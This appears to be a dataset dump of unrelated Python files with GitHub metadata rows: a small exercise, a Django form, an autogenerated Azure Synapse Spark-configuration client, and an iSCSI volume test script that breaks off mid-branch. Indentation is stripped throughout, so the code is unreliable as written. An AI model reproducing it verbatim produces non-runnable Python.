current_cup = cups.popleft()
while current_cup > 0 and bottles:
current_bottle = bottles.pop()
current_cup -= current_bottle
if current_cup < 0:
wasted_water += -current_cup
if not cups:
print('Bottles: ', end='')
print(*[bottles.pop() for i in range(len(bottles))])
else:
print('Cups: ', end='')
print(*[cups.popleft() for i in range(len(cups))])
print(f'Wasted litters of water: {wasted_water}')
| [
"[email protected]"
] | |
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3 | a51854991671a4389902945578288da34845f8d9 | /libs/Utility/__init__.py | 413df21a5385589d95b5c2ec9bf735a694a5e504 | [] | no_license | wuyou1102/DFM_B2 | 9210b4b8d47977c50d92ea77791f477fa77e5f83 | 69ace461b9b1b18a2269568110cb324c04ad4266 | refs/heads/master | 2020-04-13T18:54:20.045734 | 2019-06-17T12:46:23 | 2019-06-17T12:46:23 | 163,387,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | # -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial | [
"[email protected]"
] | |
b9f5b0e85ced88524ab8f2e59229df6b0f93c821 | e60a342f322273d3db5f4ab66f0e1ffffe39de29 | /parts/zodiac/chameleon/__init__.py | 60fbbb344ac3c226ff2ca2148893e72d3fc26add | [] | no_license | Xoting/GAExotZodiac | 6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1 | f60b2b77b47f6181752a98399f6724b1cb47ddaf | refs/heads/master | 2021-01-15T21:45:20.494358 | 2014-01-13T15:29:22 | 2014-01-13T15:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | /home/alex/myenv/zodiac/eggs/Chameleon-2.13-py2.7.egg/chameleon/__init__.py | [
"[email protected]"
] | |
580dbd15bf43272f28e3f9bd42413a905510cd76 | bef304291f5fe599f7a5b713d19544dc0cecd914 | /todoapp/todo_list/forms.py | 9fe1a617dd0f429fc6c8b3c1fa6885fee975c262 | [] | no_license | coderj001/django-todo-and-air-quality | 9ca847143ea86677a0d54026c060638fabf8c042 | 012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3 | refs/heads/master | 2020-12-14T20:20:49.845722 | 2020-01-19T15:06:42 | 2020-01-19T15:06:42 | 234,855,834 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
class Meta:
model=ToDoList
fields=['item','completed'] | [
"[email protected]"
] | |
6b2843c0a678ffe8be10b0d147adee1740dc58da | a5f8eb72e680a906f74ae53d2b6428fbb008320c | /31-zip.py | a48620bb23a58f1ecfdebf53d239f9cf71d077e5 | [] | no_license | arn1992/Basic-Python | 0588858aed632ac9e65e5618d5b57bcbe71c45bc | 09b9bf2364ddd2341f95445e18868e2e0904604d | refs/heads/master | 2020-06-28T18:35:32.394730 | 2016-12-15T07:21:33 | 2016-12-15T07:21:33 | 74,483,622 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | first=['ratul','aminur','arn']
last=['tasneem','ishrar']
names=zip(first,last)
for a,b in names:
print(a,b)
| [
"[email protected]"
] | |
9b500090e5537a2b729caa78d0590d8753bbca89 | b92adbd59161b701be466b3dbeab34e2b2aaf488 | /.c9/metadata/environment/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py | 34ca1ee1bb0f47da7e80c5643b393f16129c97b8 | [] | no_license | R151865/cloud_9_files | 7486fede7af4db4572f1b8033990a0f07f8749e8 | a468c44e9aee4a37dea3c8c9188c6c06e91cc0c4 | refs/heads/master | 2022-11-22T10:45:39.439033 | 2020-07-23T09:31:52 | 2020-07-23T09:31:52 | 281,904,416 | 0 | 1 | null | 2022-11-20T00:47:10 | 2020-07-23T09:08:48 | Python | UTF-8 | Python | false | false | 480 | py | {"filter":false,"title":"api_wrapper.py","tooltip":"/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":17,"column":17},"end":{"row":17,"column":75},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1590407780811,"hash":"c7949160d2afabed4398d4df3013ec47e225082d"} | [
"[email protected]"
] | |
90352a180e75d18219b8cba394d4d2b8f03de187 | aa0270b351402e421631ebc8b51e528448302fab | /sdk/synapse/azure-synapse-artifacts/azure/synapse/artifacts/operations/_spark_configuration_operations.py | 9d5b1194a4b1cae79ac490bbe3402239b826e729 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 33,298 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.polling.base_polling import LROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_spark_configurations_by_workspace_request(**kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations")
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_spark_configuration_request(
spark_configuration_name: str, *, if_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_match is not None:
_headers["If-Match"] = _SERIALIZER.header("if_match", if_match, "str")
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_spark_configuration_request(
spark_configuration_name: str, *, if_none_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_none_match is not None:
_headers["If-None-Match"] = _SERIALIZER.header("if_none_match", if_none_match, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_rename_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}/rename")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class SparkConfigurationOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.synapse.artifacts.ArtifactsClient`'s
:attr:`spark_configuration` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get_spark_configurations_by_workspace(self, **kwargs: Any) -> Iterable["_models.SparkConfigurationResource"]:
"""Lists sparkconfigurations.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SparkConfigurationResource or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.SparkConfigurationListResponse] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_spark_configurations_by_workspace_request(
api_version=api_version,
template_url=self.get_spark_configurations_by_workspace.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SparkConfigurationListResponse", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return ItemPaged(get_next, extract_data)
get_spark_configurations_by_workspace.metadata = {"url": "/sparkconfigurations"}
def _create_or_update_spark_configuration_initial(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
_spark_configuration = _models.SparkConfigurationResource(properties=properties)
_json = self._serialize.body(_spark_configuration, "SparkConfigurationResource")
request = build_create_or_update_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_match=if_match,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_create_or_update_spark_configuration(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> LROPoller[_models.SparkConfigurationResource]:
"""Creates or updates a sparkconfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param properties: Properties of Spark Configuration. Required.
:type properties: ~azure.synapse.artifacts.models.SparkConfiguration
:param if_match: ETag of the sparkConfiguration entity. Should only be specified for update,
for which it should match existing entity or can be * for unconditional update. Default value
is None.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either SparkConfigurationResource or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[_models.SparkConfigurationResource] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_spark_configuration_initial(
spark_configuration_name=spark_configuration_name,
properties=properties,
if_match=if_match,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def get_spark_configuration(
self, spark_configuration_name: str, if_none_match: Optional[str] = None, **kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
"""Gets a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param if_none_match: ETag of the sparkConfiguration entity. Should only be specified for get.
If the ETag matches the existing entity tag, or if * was provided, then no content will be
returned. Default value is None.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SparkConfigurationResource or None or the result of cls(response)
:rtype: ~azure.synapse.artifacts.models.SparkConfigurationResource or None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
request = build_get_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_none_match=if_none_match,
api_version=api_version,
template_url=self.get_spark_configuration.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 304]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _delete_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
template_url=self._delete_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_delete_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_delete_spark_configuration(self, spark_configuration_name: str, **kwargs: Any) -> LROPoller[None]:
"""Deletes a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _rename_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
_request = _models.ArtifactRenameRequest(new_name=new_name)
_json = self._serialize.body(_request, "ArtifactRenameRequest")
request = build_rename_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._rename_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_rename_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
@distributed_trace
def begin_rename_spark_configuration(
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> LROPoller[None]:
"""Renames a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param new_name: New name of the artifact. Default value is None.
:type new_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._rename_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
new_name=new_name,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_rename_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
| [
"[email protected]"
] | |
d1877db7913e58c396ec934ebb1dc1c993bcbbb5 | 892dd32ee0be7135cd33c875b06dcc66307dcc99 | /automation/MPTS/verifyIqn.py | b82a09a932deb898ea00bc911d3867e80a4c52da | [] | no_license | cloudbytestorage/devops | 6d21ed0afd752bdde8cefa448d4433b435493ffa | b18193b08ba3d6538277ba48253c29d6a96b0b4a | refs/heads/master | 2020-05-29T08:48:34.489204 | 2018-01-03T09:28:53 | 2018-01-03T09:28:53 | 68,889,307 | 4 | 8 | null | 2017-11-30T08:11:39 | 2016-09-22T05:53:44 | Python | UTF-8 | Python | false | false | 5,429 | py | import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
